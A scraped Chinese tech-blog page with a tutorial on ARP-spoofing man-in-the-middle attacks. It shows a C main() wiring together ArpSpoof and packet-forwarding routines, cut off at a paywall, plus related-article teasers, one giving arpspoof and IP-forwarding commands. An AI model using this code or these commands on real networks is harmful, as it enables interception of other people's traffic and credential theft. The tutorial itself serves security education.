中间人攻击的原理与实现

最新推荐文章于 2025-04-06 16:49:02 发布
最新推荐文章于 2025-04-06 16:49:02 发布
阅读量899 收藏 5
点赞数 2
CC 4.0 BY-SA版权
文章标签: 网络安全 web安全 网络攻击模型 安全威胁分析 安全架构
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/hack0919/article/details/130155993

  下面是整篇文章的鸟瞰图:(读者应该了解局域网ARP协议)

  上图便是局域网中的中间人攻击的大概思想,下面给出具体的实现方法:

(备注:右键另存为 大图较清晰)

实现"中间人"的情景,有两个关键点:

    · ARP欺骗:目的是将通信双方的数据包流经中间人。

    · 数据包分析、篡改与转发:维持通信双发的通信链接不至于中断,以免对方警觉,这样才能顺利进行下一步的行动。

  第一步:ArpSpoof

(备注:右键另存为 大图较清晰) 

  ArpSpoof模块的源码如下:

 View Code

  第二步:数据包分析、转发

  这里仅转发IP数据包,于是,我们以较简单的icmp-request & icmp-reply 为例:

  mitm-forwarder模块的源码如下:

 View Code

 第三步:

   借助于进程的fork模型,将arpspoof与mitm-forwarder二者整合为一个接口:

void main()

{
    uint8_t ip_A[4]={192,168,1,1};
    uint8_t mac_A[6]={0x14,0xE6,0xE4,0x94,0xB4,0xD6};
    uint8_t ip_B[4]={192,168,1,108};
    uint8_t mac_B[6]={0x00,0x7B,0x05,0x03,0x8E,0x90};
    uint8_t mac_M[6]={0x00,0x11,0x22,0x33,0x44,0x55};
    //BPF_filterStr: ether dst mac_M  and ip
    char * BPF_filterStr=" ether dst 00:11:22:33:44:55 and ip ";
    char * devMitm="eth0";

  //local
  pid_t sonPid;
  sonPid=fork();
  if( sonPid==-1 )
  {//failure
    printf("failure:mitm fork error :( \n");
  }
  else if(sonPid==0)
  {//child
    printf("child : pid:%d:)\n",getpid());
    ArpSpoof( ip_A,mac_A,ip_B,mac_B,mac_M,devMitm );
  }
  else
  {//parent
    printf("parent: pid:%d sonPid:%d :)\n",getpid(),sonPid);
    sleep(2);
    mitm_forwarder(
       ip_A,mac_A,
      ip_B,mac_B,
      mac_M,BPF_filterStr,
      devMitm
        );
  }
}
 

  如此,最终代码如下:
 

#include<unistd.h>
#include<pcap.h>
#include<time.h>
#include<stdio.h>
#inclu

                

        

    

  


        

            

                      
                        最低0.47元/天 解锁文章
                          
                      
            

        


    

      

        

            

              
                
                  白袍万里
                
              
            

            

                关注
              
            

        

        

          
      

      










                



	

		

			

				
					
中间人攻击的实践原理(ARP毒化、DNS欺骗)

				
			

			

				

					hello_mumu的博客
				

				

					02-25
					
					2229
					
				

			

		

		

			
				
一、共享网络交换网络的区别








1、共享网络


在共享网络中,由于HUB属于一层设备,对于到达本身的数据报文,HUB会对报文进行广播(除了收到报文的那个接口),因此接在同HUB的所有PC都能收到该报文。前提PC开启了混杂模式


注:


通常情况下,网卡都是工作在非混杂模式,也就是说即使收到数据报文,网卡会判断目的MAC是否和自己的一样,不一样的话代表数据包不是给自己的,因此...

			
		

	



                

            
              



	

		

			

				
					
Arp中间人攻击原理

				
			

			

				

					lyzaishang的博客
				

				

					03-10
					
					2461
					
				

			

		

		

			
				
1、	实践内容

设计并实现ARP攻击
可以设计并实现其他攻击
2、	实践过程
1)	各部分说明
本机IP地址
本机MAC地址
目标IP地址
网关IP地址
2)	ARP协议研究
ARP协议的全称为地址解析协议,是一种工作在网络层的协议,是一种将IP地址转换为MAC地址(物理地址)的协议因为在OSI七层模型中,IP地址在第三层网络层,传送的是IP数据报,mac地址在第二层数据链路层,传送的是数据帧,二层的以太网交换设备并不能识别32位的IP地址,它们是以48位以太网地址(就是我们常说的MAC地址)传输以太网数

			
		

	



              


  
              

                


	

		

			

				
					
教你如何实现中间人攻击

				
			

			

				

					帅醉了的博客
				

				

					11-27
					
					3440
					
				

			

		

		

			
				
使用MITMF + MSF +BEEF + CVE-2018-8570实现内网渗透
安装MITMF:目前2019.1a以上的版本kali已经没有携带mitmf,需自行安装,但目前的安装方法已经失效,而我众和多种方案,查阅相关资料,成功安装,以下是我的安装方法。
a)先安装解决所需要的包依赖
apt install python-dev python-setuptools libpcap0.8-de...

			
		

	





	

		

			

				
					
网络安全】——中间人攻击

					
最新发布

				
			

			

				

					小陈的博客
				

				

					04-06
					
					783
					
				

			

		

		

			
				
中间人攻击(Man-in-the-Middle Attack,简称MITM),是一种会话劫持攻击攻击者作为中间人,劫持通信双方会话并操纵通信过程,而通信双方并不知情,从而达到窃取信息或冒充访问的目的。中间人攻击是一个统称,具体的攻击方式有很多种,例如Wi-Fi仿冒、邮件劫持、DNS欺骗、SSL劫持等。中间人攻击常用于窃取用户登录凭据、电子邮件和银行账户等个人信息,是对网银、网游、网上交易等在线系统极具破坏性的一种攻击方式。

			
		

	



		

			
		



	

		

			

				
					
中间人攻击原理

				
			

			

				

					Elain 的渗透空间
				

				

					10-31
					
					6080
					
				

			

		

		

			
				
中间人攻击
中间人攻击(Man-in-the-MiddleAttack,简称“MITM攻击”)是一种“间接”的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间,这台计算机就称为“中间人”。




中间人攻击常见的两种方法:ARP欺骗、DNS欺骗


1. DNS欺骗


目标将其DNS请求发送到攻击者这里,然后攻击

			
		

	





	

		

			

				
					
手工实现ARP中间人攻击

				
			

			

				

					多学多思
				

				

					11-18
					
					5070
					
				

			

		

		

			
				
http://support.huawei.com/ecommunity/bbs/10170857.html
 
手工实现ARP中间人攻击

本文档针对已学习了解ARP原理及理解ARP报文结构中各个字段意义的同学。
网络环境如下图:
 
 
下面由我来讲解如何进行全手工的ARP中间人攻击,之所以不用全自动的工具,是为了让大家理清思路,所谓授人以鱼不如授人以渔!
 
中间人欺骗思

			
		

	





	

		

			

				
					
利用路由器实现中间人攻击

				
			

			

				

					07-26
				

			

		

		

			
				
在密码学和计算机安全领域中,中间人攻击 ( Man-in-the-middle attack,通常缩写为MITM )是指攻击通讯的两端分别建立独立的联系,并交换其所收到的数据,使通讯的两端认为他们正在通过一个私密的连接对方直接对话,但事实上整个会话都被攻击者完全控制。在中间人攻击中,攻击者可以拦截通讯双方的通话并插入新的内容。在许多情况下这是很简单的(例如,在一个未加密的Wi-Fi 无线接入点的接受范围内的中间人攻击者,可以将自己作为一个中间人插入这个网络)。

			
		

	





	

		

			

				
					
SSL中间人攻击原理防范

				
			

			

				

					05-21
				

			

		

		

			
				
### SSL中间人攻击原理防范  #### 一、SSL协议分析  ##### 1.1 协议概述  SSL(Secure Socket Layer),即安全套接层协议,是由Netscape公司开发的安全通信协议,用于保障互联网上的数据传输安全。SSL协议通过提供...

			
		

	





	

		

			

				
					
中间人攻击防护系统的设计实现论文.docx

				
			

			

				

					08-09
				

			

		

		

			
				
中间人攻击防护系统的设计实现论文  中间人攻击(Man-In-The-Middle attack,简称MITM)是一种常见的网络攻击手法,其中攻击者在客户端和服务器之间建立一个秘密通道,以获取敏感信息或控制通信过程。随着互联网...

			
		

	





	

		

			

				
					
中间人攻击(MITM)---常见攻击方法及原理

				
			

			

				

					daibaohui的博客
				

				

					02-19
					
					1127
					
				

			

		

		

			
				
相关学习资料




http://www.cnblogs.com/LittleHann/p/3733469.html
http://www.cnblogs.com/LittleHann/p/3738141.html
http://www.cnblogs.com/LittleHann/p/3741907.html
http://www.cnblogs.com/LittleHann/p/3708222.html
http://www.icylife.net/blog/?p=371&replytoco.

			
		

	





	

		

			

				
					
中间人攻击原码

				
			

			

				

					09-15
				

			

		

		

			
				
该原码基于windows平台  c++  经过测试运行无误

			
		

	





	

		

			

				
					
ARP中间人欺骗实现

				
			

			

				

					啊!呼伦贝尔大草原
				

				

					08-14
					
					3591
					
				

			

		

		

			
				
ARP欺骗是TCP/IP协议里面一个比较常用的攻击手段,我们需要深入了解其中的原理

			
		

	





	

		

			

				
					
HTTPS中间人攻击源代码(08年代码)

				
			

			

				

					newbix的专栏
				

				

					02-28
					
					1036
					
				

			

		

		

			
				
转自: http://www.yuanma.org/data/2007/0126/article_2183.htm 
 
by 云舒   
一段测试性质的代码,自己做一个伪造的证书,然后使用DNS SPOOF 引导被攻击者访问攻击者机器,攻击者作为中间人记录明文的数据传输。附件里面是我测试时使用的伪造的证书,使用OPENSSL生成的。  
 
代码:  
#include   
#i

			
		

	





	

		

			

				
					
LINUX 中间人攻击之arp攻击(图文解说)

				
			

			

				

					Alex_thomas的博客
				

				

					11-19
					
					6688
					
				

			

		

		

			
				
一、ARP攻击概述

ARP攻击,作为中间人攻击手段中的一种,一是可以实现对局域网中用户的断网攻击,二是可以获取到受害用户的数据流量包括浏览的网站,图片,甚至账号密码(PS:想想还是有点恐怖的!),接下来,让我先给你讲讲什么是ARP攻击的类型和原理吧!

(一)ARP的原理


ARP,即Address Resolution Protocol,地址解析协议,是根据IP地址获取物理地址的一个TCP/IP协议。简单来说,就是将IP地址转换为物理地址(PS:在一个局域网中主机之间的通信是通过物理地址来完成的,而不

			
		

	





	

		

			

				
					
Arp中间人攻击(内网攻击

				
			

			

				

					n534077的博客
				

				

					03-18
					
					1213
					
				

			

		

		

			
				
适用于内网,可以抓到目标端口的流量包。
首先启用转发功能
echo 1 > /proc/sys/net/ipv4/ip_forward(路径linux操作系统的kali)

然后输入 arpspoof -t 192.168.23.135(目标主机ip)  192.168.23.2(声明网关)
这里是欺骗192.168.23.135这个主机告诉他我是网关。当然必须要在同一个网段才行,但是可以无...

			
		

	





	

		

			

				
					
中间人攻击

				
			

			

				

					dazhongliu666的博客
				

				

					09-09
					
					777
					
				

			

		

		

			
				
所谓的中间人攻击是指,攻击者位于协议通信双方中间而发动的攻击。它是一种古老的攻击手段,并且一直到今天还具有极大的扩展空间。6.C截获了加密信息,用自己的私钥解密,获得明文。同时伪造新的信息,再用B的公钥加密,发给B。5.A将C的公钥当成了B的公钥,并用其加密信息,发给B。4.C截获了B的公钥,然后替换成自己的公钥发给A。7.B获得加密信息,用自己的私钥解密。1.A向B请求公钥,但是却被C截获。2.C向B发送公钥请求。3.B将公钥发给C。

			
		

	





	

		

			

				
					
网络安全威胁——中间人攻击

				
			

			

				

					聚集机器学习、信息安全
				

				

					12-02
					
					3244
					
				

			

		

		

			
				
中间人攻击(Man-in-the-Middle Attack,简称MITM),是一种会话劫持攻击攻击者作为中间人,劫持通信双方会话并操纵通信过程,而通信双方并不知情,从而达到窃取信息或冒充访问的目的。

			
		

	





	

		

			

				
					
HTTPS工作原理中间人攻击详解

				
			

			

				

					
				

			

		

		

			
				
 中间人攻击是指攻击者在通信双方之间插入自己,伪装成双方的通信伙伴,拦截并可能修改通信内容。HTTPS通过证书验证机制来防止这种攻击,但若证书不受信任或者被伪造,中间人攻击仍可能发生。  4. SSL的弱点  - 证书...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值